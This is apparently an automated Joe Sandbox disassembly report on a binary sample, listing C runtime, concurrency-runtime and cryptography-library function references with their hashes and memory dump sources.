                                                                                                        • API String ID: 2005118841-4071778396
                                                                                                        • Opcode ID: 9e2452a1993e1e98b917f1f21a3813083bc285eef7fbb308e1ee82f4575c9ba5
                                                                                                        • Instruction ID: 0b39c354bbb32dd8a53554a231677ba6bfe6c2af3719f466f5f585164e8fbfa3
                                                                                                        • Opcode Fuzzy Hash: 9e2452a1993e1e98b917f1f21a3813083bc285eef7fbb308e1ee82f4575c9ba5
                                                                                                        • Instruction Fuzzy Hash: 69516D72544209AFCB14DF90CC41FEEBBB9FB18720F000969F902676A2DB71A914CBA0
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABC804
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABC8B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                        • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
                                                                                                        • API String ID: 3476068407-4071778396
                                                                                                        • Opcode ID: 217933fe6d487e686a48262ae7a77803edaee609ab678d11af6335e3200dc8cd
                                                                                                        • Instruction ID: 1a7c35323283fded1327b498b2d6c5e9a3eab49377ded8fd80b27e46704cfdbf
                                                                                                        • Opcode Fuzzy Hash: 217933fe6d487e686a48262ae7a77803edaee609ab678d11af6335e3200dc8cd
                                                                                                        • Instruction Fuzzy Hash: 37415275A44608AFCB14DFA4CC85FEEB7F8FB04724F1045A9E816A7691DB74B904CB90
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A76690
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A766EE
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00A76742
                                                                                                        Strings
                                                                                                        • CryptoMaterial: this object contains invalid values, xrefs: 00A76667
                                                                                                        • CryptoMaterial: this object does not support precomputation, xrefs: 00A766C5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$___std_exception_copy
                                                                                                        • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation
                                                                                                        • API String ID: 4178755008-3364311089
                                                                                                        • Opcode ID: c19a33cadea05ff340db714aff2210dccf6a4d27633bb4632a12bdaaa2f92f64
                                                                                                        • Instruction ID: 78fb8a04eb7bf5d6e8e387b0e48124d0c4cbeabaef43d27c02b179749c705f33
                                                                                                        • Opcode Fuzzy Hash: c19a33cadea05ff340db714aff2210dccf6a4d27633bb4632a12bdaaa2f92f64
                                                                                                        • Instruction Fuzzy Hash: 02416E72940608ABCB01DF94CD41FDAB7FCEB09710F5086A6E815A7790EB75AA14CB90
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB47FD
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AB482B
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00AB4882
                                                                                                        Strings
                                                                                                        • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00AB4802
                                                                                                        • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00AB47D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$___std_exception_copy
                                                                                                        • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                                                                                                        • API String ID: 4178755008-3345525433
                                                                                                        • Opcode ID: 76c32a20295e9ec073161edfdd21467bb6622b83f49a5d37a4ceaef3d895987d
                                                                                                        • Instruction ID: 756f3c4beaa334be48d8f83fb1ace853516e1dece6edfc99e861dbea5b78685a
                                                                                                        • Opcode Fuzzy Hash: 76c32a20295e9ec073161edfdd21467bb6622b83f49a5d37a4ceaef3d895987d
                                                                                                        • Instruction Fuzzy Hash: 6A419572914209AFCB15EFA4C941BDEF7FCEF09710F0045AAE811A7792EB74A654CB60
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF1794
                                                                                                        • __Getcvt.LIBCPMT ref: 00AF17A2
                                                                                                          • Part of subcall function 00AEA86D: _Maklocstr.LIBCPMT ref: 00AEA88D
                                                                                                          • Part of subcall function 00AEA86D: _Maklocstr.LIBCPMT ref: 00AEA8AA
                                                                                                          • Part of subcall function 00AEA86D: _Maklocstr.LIBCPMT ref: 00AEA8C7
                                                                                                          • Part of subcall function 00AEA86D: _Maklocchr.LIBCPMT ref: 00AEA8D9
                                                                                                          • Part of subcall function 00AEA86D: _Maklocchr.LIBCPMT ref: 00AEA8EC
                                                                                                        • _Mpunct.LIBCPMT ref: 00AF1821
                                                                                                        • _Mpunct.LIBCPMT ref: 00AF183B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Maklocstr$MaklocchrMpunct$GetcvtH_prolog3
                                                                                                        • String ID: $+xv
                                                                                                        • API String ID: 1880433610-1686923651
Similarity
• API ID: Mpunct$GetcvtH_prolog3
• String ID: $+xv
• API String ID: 279835032-1686923651
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B20EAF,?,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002), ref: 00B20F1E
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B20F31
• FreeLibrary.KERNEL32(00000000,?,?,?,00B20EAF,?,?,00B20E4F,?,00B8C978,0000000C,00B20FA6,?,00000002,00000000), ref: 00B20F54
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00B0E224
• Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00B0E248
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B0E25B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B0E269
Similarity
• API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
• String ID: pScheduler
• API String ID: 3657713681-923244539
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B11C86
  • Part of subcall function 00B0CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00B0CB27
• Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00B11CE5
• Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00B11D0B
• Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 00B11D2B
• Concurrency::location::_Assign.LIBCMT ref: 00B11D78
Similarity
• API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
• String ID:
• API String ID: 1794448563-0
APIs
• _SpinWait.LIBCONCRT ref: 00B0C2C5
  • Part of subcall function 00B02302: _SpinWait.LIBCONCRT ref: 00B0231A
• Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00B0C2D9
• Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B0C30B
• List.LIBCMT ref: 00B0C38E
• List.LIBCMT ref: 00B0C39D
Similarity
• API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
• String ID:
• API String ID: 3281396844-0
APIs
• SetEvent.KERNEL32(?,00000000,?), ref: 00B14C06
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B14BEE
  • Part of subcall function 00B0CB06: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00B0CB27
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B14C37
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B14C69
• SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,00B8C2F0), ref: 00B14C6E
Similarity
• API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8SwitchThread
• String ID:
• API String ID: 2412095092-0
APIs
• __EH_prolog3_catch.LIBCMT ref: 00B0DDBE
• Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00B0DE0A
• std::bad_exception::bad_exception.LIBCMT ref: 00B0DE20
• std::bad_exception::bad_exception.LIBCMT ref: 00B0DE8C
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B0DE9A
                                                                                                        Similarity
                                                                                                        • API ID: std::bad_exception::bad_exception$Concurrency::Exception@8H_prolog3_catchPolicyPolicy::_SchedulerThrowValidValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702943636-0
                                                                                                        • Opcode ID: b5ef115a315ee614072f8f72e94ee643056f50cd125835f499f4c0c2dbdbd1fa
                                                                                                        • Instruction ID: 234a2870cc828b6ebca621d2886edd6b5dc396e238d4b16bd49946637dabd262
                                                                                                        • Opcode Fuzzy Hash: b5ef115a315ee614072f8f72e94ee643056f50cd125835f499f4c0c2dbdbd1fa
                                                                                                        • Instruction Fuzzy Hash: 14215E729002159FDF09EFA4D8869ADBBF4EF15310B6040E9F405AF1D1DB71AD45CB50
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C5AD
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C5D0
  • Part of subcall function 00B35B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C5F6
• _free.LIBCMT ref: 00B3C609
• FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00B421E5,00000000,?,00000000,00000000), ref: 00B3C618
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: a69f056f7106532d856ebed9cb2a305b193d12462202c6645c1a4b2c6b69b590
• Instruction ID: bc8271e6b5208fa25717326b147072a94bd395d1f08f1d77a73959f355a51a2c
• Opcode Fuzzy Hash: a69f056f7106532d856ebed9cb2a305b193d12462202c6645c1a4b2c6b69b590
• Instruction Fuzzy Hash: BC01B1726057257B272156B65C8ED7BBEEDDAC2FA272411A9FD04E3241EE608D0182B0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Maklocstr$Maklocchr
• String ID:
• API String ID: 2020259771-0
• Opcode ID: f46e346910aa6fb414e3e2aed398f96d3730ac55745c4a3ef5cf47e7485e74c9
• Instruction ID: 8efce273605befad1a619b99f6917bdfe12f61c481cf8a9e4ee0e6485181e80e
• Opcode Fuzzy Hash: f46e346910aa6fb414e3e2aed398f96d3730ac55745c4a3ef5cf47e7485e74c9
• Instruction Fuzzy Hash: E111BCB1940780BBE320DBA6D981F12B7ECAB18350F084929F1448B641E274FC4487A6
APIs
• __EH_prolog3.LIBCMT ref: 00AF86A2
• std::_Lockit::_Lockit.LIBCPMT ref: 00AF86AC
  • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
  • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
• std::_Facet_Register.LIBCPMT ref: 00AF86FD
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AF871D
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AF873B
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
• String ID:
• API String ID: 651022567-0
• Opcode ID: 67c0a6790415184ce4936c24cfabdfbabb6c90119d3496c291b38214754844f2
• Instruction ID: 3af01f4be218d66b5b7455399f29f4635a4a5063155f45225f117c4043619377
• Opcode Fuzzy Hash: 67c0a6790415184ce4936c24cfabdfbabb6c90119d3496c291b38214754844f2
• Instruction Fuzzy Hash: 0B1151329001189BCF05FBA4DD52BFDB7B5AF94710F244449F5156B291DF789E01CB90
APIs
• __EH_prolog3.LIBCMT ref: 00AF8748
• std::_Lockit::_Lockit.LIBCPMT ref: 00AF8752
  • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
  • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
• std::_Facet_Register.LIBCPMT ref: 00AF87A3
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AF87C3
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AF87E1
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
• String ID:
• API String ID: 651022567-0
• Opcode ID: d431552fbf52da9efc581f92f1058a0b746ba0c17ce5c7b3ff2f4d42ef13c615
• Instruction ID: aa707fb1cfe2b78ce8399c319379a1f139189a4f28adcda1f8488b1eeb62905e
• Opcode Fuzzy Hash: d431552fbf52da9efc581f92f1058a0b746ba0c17ce5c7b3ff2f4d42ef13c615
• Instruction Fuzzy Hash: 2B119A329002189BCF05FBA4DD52BFE77B5AF94720F284449F501AB2A1CF78AE00CB90
APIs
• __EH_prolog3.LIBCMT ref: 00AF89E0
• std::_Lockit::_Lockit.LIBCPMT ref: 00AF89EA
  • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
  • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
• std::_Facet_Register.LIBCPMT ref: 00AF8A3B
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8A5B
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AF8A79
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
• String ID:
• API String ID: 651022567-0
• Opcode ID: 3aa510dbfcd2790c512def8d5df5c68c4d35be209b10b3c1b25fd8a963a9c121
• Instruction ID: ff21128824e677d90824452f1951f67fee0daf6d456156a71e77f197d0555bea
• Opcode Fuzzy Hash: 3aa510dbfcd2790c512def8d5df5c68c4d35be209b10b3c1b25fd8a963a9c121
• Instruction Fuzzy Hash: 06119E329002189BCF05FBA4CD51AFE77B5EF94710F25448AF5116B2A1CF789E40CB90
APIs
• __EH_prolog3.LIBCMT ref: 00AF893A
• std::_Lockit::_Lockit.LIBCPMT ref: 00AF8944
  • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
  • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
• std::_Facet_Register.LIBCPMT ref: 00AF8995
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AF89B5
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AF89D3
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
• String ID:
• API String ID: 651022567-0
• Opcode ID: 848f60fd161fe8de713b130b271d76cee1bfa21b4d863b9522d55ff5663c2bd2
• Instruction ID: 121f7d995f227107bcaba4d42d63ab7c7c4801b74bc0b8e2f1f83d7ebd494810
• Opcode Fuzzy Hash: 848f60fd161fe8de713b130b271d76cee1bfa21b4d863b9522d55ff5663c2bd2
• Instruction Fuzzy Hash: D91170329002199BCF05EBE4CD52AFD77B5EF94710F244849F5156B2A1CF789E01CB91
APIs
• __EH_prolog3.LIBCMT ref: 00AE569F
• std::_Lockit::_Lockit.LIBCPMT ref: 00AE56A9
  • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
  • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
• std::_Facet_Register.LIBCPMT ref: 00AE56FA
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AE571A
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AE5738
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
• String ID:
• API String ID: 651022567-0
• Opcode ID: 7edbd1ec116f3c51fb54f58f0e637faaa0ea6dccdc64c2d66a7b6160adeb4915
• Instruction ID: 8a3580e5b84817bd4f4be0b31291715cdcded765741183fa81db7011b9e2c21f
• Opcode Fuzzy Hash: 7edbd1ec116f3c51fb54f58f0e637faaa0ea6dccdc64c2d66a7b6160adeb4915
• Instruction Fuzzy Hash: 91110272D006589BCF05EBB8DE41AFD77B4AF94714F144849E400AB2E1CF349E05CB90
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AE5745
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE574F
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE57A0
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE57C0
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE57DE
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 651022567-0
                                                                                                        • Opcode ID: 4d95bb5ac22687d3cd451061b09cefa9bfdde2982290234bbc0f04e40f49df24
                                                                                                        • Instruction ID: 6fa94392cb9361d45145faec9fbb20118c59edf057d5e53d28501b8648b6fb3c
                                                                                                        • Opcode Fuzzy Hash: 4d95bb5ac22687d3cd451061b09cefa9bfdde2982290234bbc0f04e40f49df24
                                                                                                        • Instruction Fuzzy Hash: 5611C232D00694DBCF05EBB8DD45BEE77B5AF94724F144849E415AB2E1DF749A00CB90
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,?,00B259B8,00B35BD7,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?), ref: 00B34403
                                                                                                        • _free.LIBCMT ref: 00B34438
                                                                                                        • _free.LIBCMT ref: 00B3445F
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?), ref: 00B3446C
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?), ref: 00B34475
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170660625-0
                                                                                                        • Opcode ID: 30b261442eb9cb7922d6eb8667d3d92a599ee80e68ec3db73f05db4f71bbda43
                                                                                                        • Instruction ID: 31de7777a9f5d7733f095a55015bc7c9f753116c345f06973bf610bcc773ff68
                                                                                                        • Opcode Fuzzy Hash: 30b261442eb9cb7922d6eb8667d3d92a599ee80e68ec3db73f05db4f71bbda43
                                                                                                        • Instruction Fuzzy Hash: A701F43A20070067821267797C85F2B3AEADBC1BB6F3441F9F515933A2FF24AE058121
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00B3D35D
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        • _free.LIBCMT ref: 00B3D36F
                                                                                                        • _free.LIBCMT ref: 00B3D381
                                                                                                        • _free.LIBCMT ref: 00B3D393
                                                                                                        • _free.LIBCMT ref: 00B3D3A5
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
